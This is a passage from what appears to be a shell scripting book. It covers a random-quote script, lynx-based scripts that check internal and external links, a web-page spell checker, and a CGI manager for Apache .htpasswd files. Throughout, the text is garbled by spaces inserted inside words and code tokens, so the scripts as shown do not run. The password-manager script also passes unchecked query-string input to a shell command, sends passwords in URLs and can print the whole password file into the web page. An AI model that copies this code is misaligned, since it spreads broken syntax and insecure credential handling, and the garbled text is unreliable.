f un cti o n r an din t( n) { ret urn i n t ( n * r a n d( )) + 1 }
E OF
a wk -f $aw ks cri pt < " $1"
e xi t 0

How It Works
This script is one of the simplest in the book. Given the name of a data file, it checks to ensure that the file exists and
is readable, and then it feeds the entire file to a short aw k script, which stores each line in an array (a simple data
structure), counting lines, and then randomly picks one of the lines in the array and prints it to the screen.

Running the Script


The script can be incorporated into an SSI-compliant web page with the line
< !- -#e x ec cm d=" ra ndom quot e.sh s amp l e quo t e s. tx t" - ->
Most servers require that the web page that contains this SSI include have an .s h tm l filename suffix, rather than the
more traditional . ht ml or . ht m. With that simple change, the output of the r a nd om q uo te command is
incorporated into the content of the web page.

The Results
The last few lines of Figure 8-7, in Script #75, show a randomly generated quote as part of a web page. However,
given a data file of one-liners borrowed from the Trivial.net tag line file (see h t tp : // ww w .t ri v ia l. n et /), this
script can also be tested on the command line by calling it directly:

$ r and o mqu ot e s am pleq uote s.txt


N ei the r ra in no r slee t no r dar k of n igh t . .. i t' s T ri v ia l .n et
$ r and o mqu ot e s am pleq uote s.txt
S pa m? N ot on yo ur lif e. I t's y o ur d a ily d os e of Tr iv i al . ne t

Hacking the Script


It would be remarkably simple to have the data file that ran d o mq uo te uses contain a list of graphic image names,
for example, and then use this simple script to rotate through a set of graphics. There's really quite a bit more you can
do with this idea once you think about it!

Chapter 9: Web and Internet Administration


If you're running a web server or are responsible for a website, simple or complex, you find yourself performing some
tasks with great frequency, ranging from identifying broken internal and external site links to checking for spelling errors
on web pages. Using shell scripts, you can automate these tasks, as well as some common client/ server tasks, such
as ensuring that a remote directory of files is always completely in sync with a local copy, to great effect.

#77 Identifying Broken Internal Links


The scripts in Chapter 7 highlighted the value and capabilities of the ly n x text-only web browser, but there's even
more power hidden within this tremendous software application. One capability that's particularly useful for a web
administrator is the tra ve rse function (which you enable by using - tr av e rs a l), which causes l y nx to try to
step through all links on a site to see if any are broken. This feature can be harnessed in a short script.

The Code
# !/ bin / sh
# c hec k lin ks - Tr aver ses all i n ter n a l U R L s on a we bs i te , r ep o rt in g
#
an y er ro rs in the "tr avers e .er r o rs" f il e.
l yn x=" / usr /l oca l/ bin/ lynx "

# t h is m i gh t ne e d to be tw ea k ed

# R emo v e a ll th e lynx tra versa l ou t p ut f i le s up o n co m pl e ti on :


t ra p " / bin /r m - f trav erse *.err o rs r e jec t * .d at t r av er s e* . da t" 0
i f [ - z "$ 1" ] ; then
e cho "Us ag e: ch eckl inks URL" >&2 ; ex i t 1
fi
$ ly nx - tra ve rsa l "$1" > / dev/n u ll
i f [ - s "t ra ver se .err ors" ] ; t hen
e cho -n $( wc -l < t rave rse.e r ror s ) er r o rs e nc o un te r ed .
e cho Che ck ed $( grep '^h ttp' t rav e r se. d a t | wc -l ) p ag e s at ${ 1} :
s ed " s|$ 1| |g" < tra vers e.err o rs
e ls e
e cho -n "N o e rr ors enco unter e d. " ;
e cho Che ck ed $( grep '^h ttp' t rav e r se. d a t | wc -l ) p ag e s at ${ 1}
e xit 0
fi
b as eur l ="$ (e cho $ 1 | cut -d/ - f 3)"
m v tra v ers e. err or s ${ base url}. e rro r s
e ch o " ( A c op y o f this out put h a s b e e n s a v ed i n $ {b as e ur l }. er r or s) "
e xi t 0

How It Works
The vast majority of the work in this script is done by ly n x ; the script just fiddles with the resultant l y nx output files
to summarize and display the data attractively. The ly n x output file r e je ct . da t contains a list of links pointing to
external URLs (see Script #78, Reporting Broken External Links, for how to exploit this data); t ra v er se . er ro r s
contains a list of failed, invalid links (the gist of this script); t r ave r se . da t contains a list of all pages checked; and
t ra ver s e2. da t is identical to trav erse . d at except that it also includes the title of every page visited.

Running the Script


To run this script, simply specify a URL on the command line. Because it goes out to the network, you can traverse
and check any website, but beware: Checking something like Google or Yahoo! will take forever and eat up all of your
disk space in the process.

The Result
First off, let's check a tiny website that has no errors:
$ c hec k lin ks ht tp ://w ww.o ureco p ass . o rg/
N o err o rs en cou nt ered . Ch ecked 4 p a g es a t h tt p: / /w ww . ou r ec op a ss .o r g/
Sure enough, all is well. How about a slightly larger site?
$ c hec k lin ks ht tp ://w ww.c lickt h rus t a ts. c o m/
1 e rro r s e nc oun te red. Che cked 9 pa g e s a t ht tp :/ / ww w. c li c kt hr u st at s .c om / :
c on tac t us. sh tml
i n pri v acy . s htm l
( A cop y of t his o utpu t ha s bee n sa v e d i n ww w. cl i ck th r us t at s. c om .e r ro rs )
This means that the file pri va cy.s html contains a link to co n ta c tu s. s ht m l that cannot be resolved: The file
c on tac t us. sh tml does not exist. Finally, let's check my main website to see what link errors might be lurking:
$ d ate ; c he ckl in ks h ttp: //www . int u i tiv e . co m/ ; da te
T ue Se p 16 2 1:5 5: 39 G MT 2 003
6 e rro r s e nc oun te red. Che cked 7 28 p a ges a t ht tp : // ww w .i n tu it i ve .c o m/ :
l ib rar y /f8
i n li brar y/Art o fWr i t ing . s ht ml
l ib rar y /f1 1
i n li brar y/Art o fWr i t ing . s ht ml
l ib rar y /f1 6
i n li brar y/Art o fWr i t ing . s ht ml
l ib rar y /f1 8
i n li brar y/Art o fWr i t ing . s ht ml
a rt icl e s/c oo kie s/
i n art i cle s / csi - c ha t. ht m l
~ ta ylo r
i n ar ticl es/ao l -tr a n scr i p t. ht ml
( A cop y of t his o utpu t ha s bee n sa v e d i n ww w. in t ui ti v e. c om .e r ro rs )
T ue Se p 16 2 2:0 2: 50 G MT 2 003
Notice that adding a call to dat e before and after a long command is a lazy way to see how long the command takes.
Here you can see that checking the 728-page int u i tiv e . com site took just over seven minutes.

Hacking the Script


The gre p statement in this script produces a list of all files checked, which can be fed to w c -l to ascertain how
many pages have been examined. The actual errors are found in the tr av e rs e .e rr o rs file:
e ch o C h eck ed $( gr ep ' ^htt p' tr a ver s e .da t | wc - l ) pa g es at $ { 1} :
s ed "s | $1| |g " < t rave rse. error s
To have this script report on image (img) reference errors instead, g re p the tr a ve rs e .e rr o rs file for g if ,
j pe g, or pn g filename suffixes before feeding the result to the s ed statement (which just cleans up the output format
to make it attractive).

#78 Reporting Broken External Links


This partner script to Script #77, Identifying Broken Internal Links, utilizes the - t r a v e r s a l option of l y n x to
generate and test a set of external links links to other websites. When run as a traversal of a site, l y n x produces
a number of data files, one of which is called r e j e c t . d a t . The r e j e c t . d a t file contains a list of all external
links, both website links and mai l to: links. By iteratively trying to access each h t t p link in r e j e c t . d a t , you
can quickly ascertain which sites work and which sites fail to resolve, which is exactly what this script does.

The Code
# ! / b in /s h
# c h ec ke xte r nal - Tra v erse s a l l i n t e r n a l U R L s o n a w e b s i t e t o b u i l d a
#
li st of exte r nal r efer enc e s , t h e n c h e c k s e a c h o n e t o a s c e r t a i n
#
wh ic h m i ght b e de a d or ot h e r w i s e b r o k e n . T h e - a f l a g f o r c e s t h e
#
sc ri pt t o li s t al l mat che s , w h e t h e r t h e y ' r e a c c e s s i b l e o r n o t : b y
#
de fa ult only unre a chab le l i n k s a r e s h o w n .
l y n x =" /u sr/ l ocal / bin/ l ynx"
l i s t al l= 0; e rror s =0

# might need to be tweaked


# shortcut: two vars on one line!

i f [ " $1 " = "-a" ] ; t hen


l i st al l=1 ; shi f t
fi
o u t f il e= "$( e cho " $1" | cut -d / - f 3 ) . e x t e r n a l - e r r o r s "
/ b i n /r m -f $ outf i le

# cle a n i t f o r n e w o u t p u t

t r a p " /b in/ r m -f trav e rse* .er r o r s r e j e c t * . d a t t r a v e r s e * . d a t " 0


i f [ - z "$1 " ] ; then
e c ho " Usa g e: $ ( base n ame $0) [ - a ] U R L " > & 2
e x it 1
fi
# C r ea te th e dat a fil e s ne ede d
$ l y n x -t rav e rsal $1 > /dev /nu l l ;
i f [ - s "re j ect. d at" ] ; t hen
# Th e fol l owin g lin e has a t r a i l i n g s p a c e a f t e r t h e b a c k s l a s h !
e c ho - n $ ( sort -u r e ject .da t | w c - l ) e x t e r n a l l i n k s e n c o u n t e r e d
e c ho i n $ ( grep '^ht t p' t rav e r s e . d a t | w c - l ) p a g e s
f o r UR L i n $(g r ep ' ^ http :' r e j e c t . d a t | s o r t - u )
do
if ! $l y nx - d ump $ URL > / d e v / n u l l 2 > & 1 ; t h e n
ec ho " Fail e d : $ URL" >> $ o u t f i l e
er ror s ="$( ( $err o rs + 1) ) "
el if [ $ list a ll - e q 1 ] ; t h e n
ec ho " Succ e ss: $ URL" >> $ o u t f i l e
fi
d o ne
i f [ - s $ o utfi l e ] ; the n
ca t $ou t file
ec ho "( A cop y of t his out p u t h a s b e e n s a v e d i n $ { o u t f i l e } ) "
e l if [ $l i stal l -eq 0 -a $e r r o r s - e q 0 ] ; t h e n
ec ho "N o pro b lems enco unt e r e d . "
fi
else
e c ho - n " N o ex t erna l lin ks e n c o u n t e r e d " ;
e c ho i n $ ( grep '^ht t p' t rav e r s e . d a t | w c - l ) p a g e s .
fi
exit 0

How It Works
This is not the most elegant script in this book. It's more of a brute-force method of checking external links, because for
each external link found, the l ynx command tests the validity of the link by trying to grab the contents of its URL and
then discarding them as soon as they've arrived, as shown in the following block of code:

if ! $l y nx - d ump $ URL > / d e v / n u l l 2 > & 1 ; t h e n


ec ho " Fail e d : $ URL" >> $ o u t f i l e
er ror s ="$( ( $err o rs + 1) ) "
el if [ $ list a ll - e q 1 ] ; t h e n
ec ho " Succ e ss: $ URL" >> $ o u t f i l e
fi
The notation 2>& 1 is worth mentioning here: It causes output device #2 to be redirected to whatever output device #1
is set to. With a shell, output #2 is s tderr (for error messages) and output #1 is s t d o u t (regular output). Used
alone, 2 >& 1 will cause s t derr to go to st d o u t . In this instance, however, notice that prior to this redirection,
s t d o ut is already redirected to the so-called bit bucket of / d e v / n u l l (a virtual device that can be fed an infinite
amount of data without ever getting any bigger. Think of a black hole, and you'll be on the right track). Therefore, this
notation ensures that st d err is also redirected to / d e v / n u l l . We're throwing all of this information away because
all we're really interested in is whether ly nx returns a zero or nonzero return code from this command (zero indicates
success; nonzero indicates an error).
The number of internal pages traversed is calculated by the line count of the file t r a v e r s e . d a t , and the number of
external links is found by looking at re ject . d a t . If the -a flag is specified, the output lists all external links, whether
they're reachable or not; otherwise only failed URLs are displayed.

Running the Script


To run this script, simply specify the URL of a site to check.

The Results
Let's check a simple site with a known bad link. The - a flag lists all external links, valid or not.
$ c h ec ke xte r nal - a ht t p:// www . o u r e c o p a s s . o r g /
8 e x te rn al l inks enco u nter ed i n 4 p a g e s
F a i l ed : ht t p:// w ww.b a dlin k/s o m e w h e r e . h t m l
S u c c es s: ht t p:// w ww.c i .bou lde r . c o . u s / g o b o u l d e r /
S u c c es s: ht t p:// w ww.e c opas s.o r g /
S u c c es s: ht t p:// w ww.i n tuit ive . c o m /
S u c c es s: ht t p:// w ww.r i dear ran g e r s . o r g /
S u c c es s: ht t p:// w ww.r t d-de nve r . c o m /
S u c c es s: ht t p:// w ww.t r ansi tal l i a n c e . o r g /
S u c c es s: ht t p:// w ww.u s 36tm o.o r g /
( A c op y of t his o utpu t has be e n s a v e d i n w w w . o u r e c o p a s s . o r g . e x t e r n a l - e r r o r s )
To find the bad link, we can easily use the gr e p command on the set of HTML source files:
$ g r ep ' bad l ink/ s omew h ere. htm l ' ~ e c o p a s s / *
~ e c o pa ss /co n tact . html : <a h ref = " h t t p : / / w w w . b a d l i n k / s o m e w h e r e . h t m l " > b a d < / a >
With a larger site, well, the program can run for a long, long time. The following took three hours to finish testing:
$ d a te ; ch e ckex t erna l htt p:/ / w w w . i n t u i t i v e . c o m / ; d a t e
T u e Se p 16 2 3:16 : 37 G M T 20 03
7 3 3 ex te rna l lin k s en c ount ere d i n 7 2 8 p a g e s
F a i l ed : ht t p:// c hemg o d.sl ip. u m d . e d u / ~ k i d w e l l / w e a t h e r . h t m l
F a i l ed : ht t p:// e poch . orei lly . c o m / s h o p / c a r t . a s p
F a i l ed : ht t p:// e zone . org: 108 0 / e z /
F a i l ed : ht t p:// t echw e b.cm p.c o m / c w / w e b c o m m e r c e /
F a i l ed : ht t p:// t enbr o oks1 1.l a n m i n d s . c o m /
F a i l ed : ht t p:// w ww.b u ilde r.c n e t . c o m /
F a i l ed : ht t p:// w ww.b u zz.b uil d e r . c o m /
F a i l ed : ht t p:// w ww.c h em.e mor y . e d u / h t m l / h t m l . h t m l
F a i l ed : ht t p:// w ww.t r uste .or g /
F a i l ed : ht t p:// w ww.w a nder -lu s t . c o m /
F a i l ed : ht t p:// w ww.w e bsit ega r a g e . c o m /
( A c op y of t his o utpu t has be e n s a v e d i n w w w . i n t u i t i v e . c o m . e x t e r n a l - e r r o r s )
W e d Se p 17 0 2:11 : 18 G M T 20 03
Looks as though it's time for some cleanup work!

#79 Verifying Spelling on Web Pages


This script, w ebs pe ll, is an amalgamation of ideas presented in earlier scripts, particularly Script #27, Adding a
Local Dictionary to Spell, which demonstrates how to interact with the a s pe ll spelling utility and how to filter its
reported misspellings through your own list of additional acceptable words. It relies on the l y nx program to pull all the
text out of the HTML of a page, either local or remote, and then feeds the resultant text to as p el l or an equivalent
spelling program.

The Code
# !/ bin / sh
# w ebs p ell - Us es the spe ll fe a tur e + l y n x to s p el l- c he c k ei t he r a
# w eb p age U RL or a f ile.
# I nev i tab ly yo u' ll f ind that t her e are w or ds i t f la g s a s wr o ng b u t
# y ou t hin k are f ine. Sim ply s a ve t h em i n a f il e , on e p e r li n e, a n d
# e nsu r e t ha t ' ok aywo rds' poin t s t o tha t fi le .
o ka ywo r ds= "$ HOM E/ bin/ .oka yword s "
t em pou t ="/ tm p/w eb spel l.$$ "
t ra p " / bin /r m - f $tem pout " 0
i f [ $ # -e q 0 ] ; the n
e cho "Us ag e: we bspe ll f ile|U R L" > & 2; e x it 1
fi
f or fi l ena me
do
i f [ ! - f "$f il enam e" - a "$( e cho $ fil e n am e| cu t - c1 - 7) " ! = " ht tp : // " ]
t hen
co n tin ue
# pick ed up dir e c tor y in ' *' li st i ng
fi
l ynx -du mp $f il enam e | tr ' ' '\ n ' | s o rt - u | \
gr e p - vE "( ^[ ^a-z ]|') " | \
# A dju st th e foll owin g lin e to p rod u c e ju st a li s t o f mi s sp el l ed w o rd s
is p ell - a | a wk ' /^\& / { p r int $ 2 } ' | \
so r t - u > $ te mpou t
i f [ -r $o kay wo rds ] ; then
# I f y ou ha ve an okay words fil e , sc r e en o ka y w or d s o ut
gr e p - vi f $ ok aywo rds < $te m pou t > $ { t em po ut } .2
mv ${t em pou t} .2 $ temp out
fi
i f [ -s $t emp ou t ] ; th en
ec h o " Pr oba bl e sp elli ng er r ors : ${f i l en am e} "
ca t $t em pou t | pa ste - - - - | s ed ' s /^ / /'
fi
d on e
e xi t 0

How It Works
Using the helpful lyn x command, this script extracts just the text from each of the specified pages and then feeds the
result to a spell-checking program (ispe ll in this example, though it works just as well with a s pe ll or another
spelling program. See Script #25, Checking the Spelling of Individual Words, for more information about different spellchecking options in Unix).
Notice the file existence test in this script too:
i f [ ! -f "$ fil en ame" -a "$(ec h o $ f i len a m e| cu t - c1 -7 ) " ! = "h t tp :/ / "

It can't just fail if the given name isn't readable, because $ f i len a me might actually be a URL, so the test becomes
rather complex. However, when referencing filenames, the script can work properly with invocations like w e bs pe l l
* , though you'll get better results with a filename wildcard that matches only HTML files. Try w eb s pe ll *h tm l
instead.
Whichever spell-checking program you use, you'll need to ensure that the result of the following line is a list only of
misspelled words, with none of the spell-checking utility's special formatting included:
i sp ell -a | awk ' /^\& / { print $2 } ' | \
This spell line is but one part of a quite complex pipeline that extracts the text from the page, translates it to one word
per line (the t r invocation), sorts the words, and ensures that each one appears only once in the pipeline (so r t u ). After the sort operation, we screen out all the lines that don't begin with a lowercase letter (that is, all punctuation,
HTML tags, and other content). Then the next line of the pipe runs the data stream through the s pe ll utility, using
a wk to extract the misspelled word from the oddly formatted i s p el l output. The results are run through a so r t -u
invocation, screened against the oka yword s list with gre p , and formatted for attractive output with p a st e (which
produces four words per line in this instance).

Running the Script


This script can be given one or more web page URLs or a list of HTML files. To check the spelling of all source files in
the current directory, for example, use *. html as the argument.

The Results
$ w ebs p ell h ttp :/ /www .cli ckthr u sta t s .co m / in de x. s ht ml *. h tm l
P ro bab l e s pe lli ng err ors: http : //w w w .cl i c kt hr us t at s. c om / in de x .s ht m l
c afe p res s
m icro url
si g n up u r lw ir e
P ro bab l e s pe lli ng err ors: 074- c ont a c tus . h tm l
w ebs p ell
w erd
In this case, the script checked a web page on the network from the Cl ic k -T h ru St a ts .c o m site and five local
HTML pages, finding the errors shown.

Hacking the Script


It would be a simple change to have w ebspe l l invoke the s h p el l utility presented in Script #26, but it can be
dangerous correcting very short words that might overlap phrases or content of an HTML tag, JavaScript snippet, and
so forth, so some caution is probably in order.
Also worth considering, if you're obsessed with avoiding any misspellings creeping into your website, is this: With a
combination of correcting genuine misspellings and adding valid words to the ok a yw o rd s file, you can reduce the
output of web spe ll to nothing and then drop it into a weekly c ro n job to catch and report misspellings
automatically.

#80 Managing Apache Passwords


One terrific feature of the Apache web server is that it offers built-in support for password-protected directories, even
on a shared public server. It's a great way to have private, secure, and limited-access information on your website,
whether you have a pay subscription service or you just want to ensure that family pictures are viewed only by family.
Standard configurations require that in the password-protected directory you manage a data file called . ht ac c es s,
which specifies the security "zone" name and, most importantly, points to a separate data file, which in turn contains the
account name and password pairs that are used to validate access to the directory. Managing this file is not a problem,
except that the only tool included with Apache for doing so is the primitive h t pa s sw d program, which is run on the
command line. Instead, this script, apm, one of the most complex and sophisticated scripts in this book, offers a
password management tool that runs as a CGI script and lets you easily add new accounts, change the passwords on
existing accounts, and delete accounts from the access list.
To get started, you will need a properly formatted .ht a c ces s file to control access to the directory it's located within.
For demonstration purposes, this file might look like the following:
$ c at . hta cc ess
A ut hUs e rFi le /w eb /int uiti ve/wi c ked / e xam p l es /p ro t ec te d /. h tp as s wd
A ut hGr o upF il e / de v/nu ll
A ut hNa m e " Sa mpl e Prot ecte d Dir e cto r y "
A ut hTy p e B as ic
< Li mit GET >
r eq uir e va li d-u se r
< /L imi t >
A separate file, .h tp ass wd , contains all the account and password pairs. If this file doesn't yet exist, you'll need to
create one, but a blank one is fine: Use to uc h. h t pas s w d and ensure that it's writable by the user ID that runs
Apache itself (probably user nobo dy). Then we're ready for the script.

The Code
# !/ bin / sh
# a pm - Ap ac he
#
ma n age t he
#
fo r ac ce ss
#
th e co nf ig

Pa sswo rd M anage r . A l l ows t he a dm i ni st r at o r to ea si l y


ad diti on, updat e , o r del e t io n of ac co u nt s a nd pa ss w or ds
to a s ubdi recto r y o f a t y p ic al A p ac he co n fi gu r at io n ( wh e re
fi le i s ca lled . hta c c ess ) .

e ch o " C ont en t-t yp e: t ext/ html"


e ch o " "
e ch o " < htm l> <ti tl e>Ap ache Pass w ord M ana g e r Ut il i ty </ t it l e> <b o dy >"
m yn ame = "$( ba sen am e $0 )"
t em ppw f ile =" /tm p/ apm. $$";
t r a p " / b in /r m - f $t e mp p wf il e " 0
f oo ter = "ap m- foo te r.ht ml"
h ta cce s s=" .h tac ce ss"
# i f you use a /c g i -b in , m ak e s ur e t hi s p oi n ts
# t o the cor r e ct . h ta cc es s f il e !
#
Mo d ern v ers io ns o f 'h tpass w d' i n clu d e a - b f la g t ha t l et s y ou sp ec i fy
#
th e pa ss wor d on t he c omman d li n e . I f yo ur s c an d o t h at , s pe ci f y it
#
he r e, wi th th e '- b' f lag:
# h tpa s swd =" /us r/ loca l/bi n/htp a ssw d -b"
#
Ot h erw is e, th ere' s a simpl e Pe r l re w r it e of th is sc r ip t t ha t i s a g oo d
#
su b sti tu te, a t ht tp:/ /www. i ntu i t ive . c om /s he l lh ac k s/ e xa mp l es /h t tp as s wd -b . pl
h tp ass w d=" /w eb/ in tuit ive/ wicke d /ex a m ple s / pr ot ec t ed /h t pa s sw d- b .p l"
i f [ " $ REM OT E_U SE R" ! = "a dmin" -a - s $h t p as sw d ] ; t h en
e cho "Er ro r: yo u mu st b e use r <b > a dmi n < /b > to us e A PM . "
e xit 0
fi
# N ow g et th e p as swor d fi lenam e fr o m th e .h ta cc e ss f i le
i f [ ! -r "$ hta cc ess" ] ; then

fi

e cho "Er ro r: ca nnot rea d $ht a cce s s fi l e i n th i s di r ec t or y. "


e xit 0

p as swd f ile =" $(g re p "A uthU serFi l e" $ h tac c e ss | c u t -d \ - f 2) "
if [ !
e cho
e xit
e li f [
e cho
e xit
fi

-r $p ass wd file ] ; then


"Er ro r: ca n't read pass w ord f ile : ca n' t m ak e u pd a te s. "
0
! - w $pa ss wdfi le ] ; th e n
"Er ro r: ca n't writ e to p ass w o rd f i le : ca n 't u p da t e. "
0

e ch o " < cen te r>< h2 sty le=' backg r oun d : #cc f ' >A pa ch e P as s wo r d Ma n ag er < /h 2> "
a ct ion = "$( ec ho $Q UERY _STR ING | cut - c3) "
u se r=" $ (ec ho $Q UE RY_S TRIN G|cut -d\ & -f2 | c ut - d= -f 2| t r ' [: up p er :] ' ' [: l ow er : ]' )"
c as e " $ act io n" in
A ) e cho " <h3 >A ddin g Ne w Use r <u > $ use r < /u >< /h 3 >"
if [ ! - z "$(g rep -E "^ $ {us e r }:" $ pa ss wd f il e) " ] ; th e n
e ch o " Er ror: use r <b> $ use r < /b> a lr ea dy ap pe a rs in t h e fi l e. "
els e
p as s=" $( echo $QU ERY_S T RIN G | cut - d\ & -f 3 |c ut -d = - f2 ) "
i f [ ! - z "$ (ech o $pa s s | t r - d '[ [: up p er :] [ :l o we r: ] [: di g it :] ] ') " ]
t he n
e cho " Erro r: p asswo r ds c a n o n l y co nt a in a - z A -Z 0 - 9 ($ p as s) "
e ls e
$ htp as swd $pas swdfi l e $ u s er $ p as s
e cho " Adde d!<b r>"
fi
fi
;;
U ) e cho " <h3 >U pdat ing Passw o rd f o r u s e r <u >$ u se r< / u> < /h 3> "
if [ -z "$ (gre p -E "^${ u ser } : " $ p a ss wd fi l e) " ] ; th en
e ch o " Er ror: use r <b> $ use r < /b> i sn 't i n t he pa s sw or d f il e ?"
e ch o " <p re>" ;cat $pas s wdf i l e;e c h o "< /p r e> "
e ch o " se arch ed f or &q u ot; ^ $ {us e r }: &q uo t ; in $p a ss wd f il e"
els e
p as s=" $( echo $QU ERY_S T RIN G | cut - d\ & -f 3 |c ut -d = - f2 ) "
i f [ ! - z "$ (ech o $pa s s | t r - d '[ [: up p er :] [ :l o we r: ] [: di g it :] ] ') " ]
t he n
e cho " Erro r: p asswo r ds c a n o n l y co nt a in a - z A -Z 0 - 9 ($ p as s) "
e ls e
g rep - vE " ^${u ser}: " $p a s swd f i le > $ t em pp w fi l e
m v $ te mppw file $pas s wdf i l e
$ htp as swd $pas swdfi l e $ u s er $ p as s
e cho " Upda ted! <br>"
fi
fi
;;
D ) e cho " <h3 >D elet ing User < u>$ u s er< / u >< /h 3> "
if [ -z "$ (gre p -E "^${ u ser } : " $ p a ss wd fi l e) " ] ; th en
e ch o " Er ror: use r <b> $ use r < /b> i sn 't i n t he pa s sw or d f il e ?"
eli f [ " $u ser" = " admin " ] ; the n
e ch o " Er ror: you can' t de l e te t h e 'a dm i n' a c co u nt ."
els e
g re p - vE "^$ {use r}:" $ pas s w dfi l e > $ te m pp wf i le
m v $te mp pwfi le $ passw d fil e
e ch o " De lete d!<b r>"
fi
;;
e sa c
# A lwa y s l is t t he cur rent user s in t he p a ss wo rd fi le . ..
e ch o " < br> <b r>< ta ble bord er='1 ' ce l l spa c i ng =' 0' wi dt h =' 8 0% ' c el lp a dd in g =' 3' > "
e ch o " < tr bg col or ='#c cccc c'><t h co l s pan = ' 3' >L is t "

e ch o " o f a ll cu rr ent user s</td > </t r > "


o ld IFS = $IF S ; I FS =":"
# chan g e w o r d s p l it d el i mi te r
w hi le r ead a cct p w ; do
e cho "<t r> <th >$ acct </th ><td a lig n = cen t e r> <a h r ef =\ " $m y na me ? a= D& u =$ ac c t\ "> "
e cho "[d el ete ]< /a>< /td> </tr> "
d on e < $pa ss wdf il e
e ch o " < /ta bl e>"
I FS =$o l dIF S
# and r e sto r e it
# B uil d op ti ons tr ing with all a cco u n ts i n cl ud ed
o pt ion s tri ng ="$ (c ut - d: - f1 $p a ssw d f ile | s ed ' s /^ /< o pt i on >/ ' |t r ' \n ' ' ' )"
# A nd o utp ut th e foot er
s ed -e "s/ -- myn am e--/ $myn ame/g " -e " s/- - o pt io ns - -/ $o p ti o ns tr i ng /g " < $ f oo te r
e xi t 0

How It Works
There's a lot working together for this script to function. Not only do you need to have your Apache configuration (or
equivalent) correct, but you need to have the correct entries in the . h ta cc e ss file and you need an . ht pa s sw d
file with (ideally) at least an entry for the ad mi n user.
The script itself extracts the h tpass wd filename from the . h tac c es s file and does a variety of tests to sidestep
common h tpa ss wd error situations, including an inability for the script to write to the file. It also checks to ensure
that the user is logged in as ad min if the password file exists and is nonzero in size. All of this occurs before the main
block of the script, the c as e statement.

Processing Changes to .htpasswd


The cas e statement ascertains which of three possible actions is requested (A = add a user, U = update a user
record, and D = delete a user) and invokes the correct segment of code accordingly. The action and the user account
on which to perform the action are specified in the Q UER Y _ STR I NG variable (sent by the web browser to the server)
as a =X& u =Y, where X is the action letter code and Y is the specified username. When a password is being changed
or a user is being added, a third argument, p , is needed and sent to the script.
For example, let's say I was adding a new user called joe , with the password k n if e. This action would result in the
following Q UER Y_ STR IN G being given to the script from the web server:
a =A &u= j oe& p= kni fe
The script would unwrap this so that acti on was A , u s e r was j oe , and pa s s was kn if e . Then it would ensure
that the password contains only valid alphabetic characters in the following test:
i f [ ! -z "$ (ec ho $pa ss | tr - d '[ [ : upp e r :] [: lo w er :] [ :d i gi t: ] ]' )" ] ; t he n
e cho "Er ro r: pa sswo rds can o n ly c o nta i n a -z A - Z 0- 9 ( $ pa ss ) "
Finally, if all was well, it would invoke the htp a ssw d program to encrypt the password and add the new entry to the
. ht pas s wd file:
$ ht pas s wd $p ass wd file $us er $p a ss

Listing All User Accounts


In addition to processing requested changes to the . h tpa s s wd file, directly after the c as e statement this script also
produces an HTML table that lists each user in the . h tpa s s wd file, along with a [d e le te ] link.
After producing three lines of HTML output for the heading of the table, the script continues with the interesting code:
o ld IFS = $IF S ; I FS =":"
# chan g e w o r d s p l it d el i mi te r
w hi le r ead a cct p w ; do
e cho "<t r> <th >$ acct </th ><td a lig n = cen t e r> <a h r ef =\ " $m y na me ? a= D& u =$ ac c t\ "> "
e cho "[d el ete ]< /a>< /td> </tr> "
d on e < $pa ss wdf il e
e ch o " < /ta bl e>"
I FS =$o l dIF S
# and r est o r e i t
This w hile loop reads the name and password pairs from the . ht p as sw d file through the trick of changing the input
field separator (I FS) to a colon (and changing it back when done).

Adding a Footer of Actions to Take


The script also relies on the presence of an HTML file called a p m- fo ot e r. h tm l that contains quite a bit of code
itself, including occurrences of the strings "--myname--" and "--options--", which are replaced by the current name of
the CGI script and the list of users, respectively, as the file is output to st do u t.
s ed -e "s/ -- myn am e--/ $myn ame/g " -e " s/- - o pt io ns - -/ $o p ti o ns tr i ng /g " < $ f oo te r
The $my n ame variable is processed by the CGI engine, which replaces the variable with the actual name of the script.
The script itself builds the $opt ions tring variable from the account name and password pairs in the
. ht pas s wd file:
o pt ion s tri ng ="$ (c ut - d: - f1 $p a ssw d f ile | s ed ' s /^ /< o pt i on >/ ' |t r ' \n ' ' ' )"
And here's the HTML footer file itself, which provides the ability to add a user, update a user's password, and delete a
user:
< !- - f o ote r inf or mati on f or AP M sy s t em. - ->
< di v s t yle =' mar gi n-to p: 1 0px;' >
< ta ble bor de r=' 1' cel lpad ding= ' 2' c e lls p a ci ng =' 0 ' wi d th = "8 0% " >
<t r>< t h c ol spa n= '4' bgco lor=' # ccc c c c'> P a ss wo rd Ma na g er Ac ti o ns </ t h> </ t r>
<t r>< t d>
< for m me th od= "g et" acti on="- - myn a m e-- " >
< tab l e b or der =' 0'>
<t r ><t d> <in pu t ty pe=' hidde n ' n a m e=" a " v al ue = "A ">
a d d u se r:< /t d><t d><i nput t ype = ' tex t ' n am e= ' u' s i ze = '1 0' >
</ t d>< /t r>< tr ><td >
p a ssw or d: </ td>< td> <inpu t ty p e ='t e x t' n am e =' p' si z e= '1 0 '>
< i npu t typ e= 'sub mit' valu e ='+ ' >
</ t d>< /t r>
< /ta b le> </ for m>
< /t d>< t d>
< for m me th od= "g et" acti on="- - myn a m e-- " >
< tab l e b or der =' 0'>
<t r ><t d> <in pu t ty pe=' hidde n ' n a m e=" a " v al ue = "U ">
u pda te </t d> <td> <sel ect n a me= ' u '>- - o pt io ns - -< /s e le c t>
</ t d>< /t r>< tr ><td >
p ass wo rd: < /td> <td> <inpu t ty p e ='t e x t' n am e =' p' si z e= '1 0 '>
< inp ut ty pe ='su bmit ' val u e=' @ ' >
</ t d>< /t r>
< /ta b le> </ for m>
< /t d>< t d>
< for m me th od= "g et" acti on="- - myn a m e-- " > <i np ut ty pe = 'h i dd en '
na m e=" a" va lu e="D ">de lete < sel e c t n a m e= 'u '> -- op t io n s- - < /s el e ct >
<i n put t ype =' subm it' value = '-' > </f o r m>
< /t d>< t d>
< for m me th od= "g et" acti on="- - myn a m e-- " > <i np ut ty pe = 'h i dd en '
n ame = "a" v alu e= "L"> <inp ut ty p e=' s u bmi t ' v al ue = 'l is t a l l us e rs '>
< /fo r m>
< /t d>< / tr>
< /t abl e >
< /d iv>
< /b ody >
< /h tml >

Running the Script


You'll most likely want to have this script in the same directory you're endeavoring to protect with passwords, although
you can also put it in your cg i-bin directory: Just tweak the ht pa ss w d value at the beginning of the script as
appropriate. You'll also need an .h tacc ess file defining access permissions and an .h t pa ss w d file that's at least
zero bytes and writable, if nothing else.
Very helpful tip

When you use a pm, make sure that the first account you create is ad m in , so you
can use the script upon subsequent invocations! There's a special test in the code
that allows you to create the a d mi n account if .h t pa ss w d is empty.

The Result
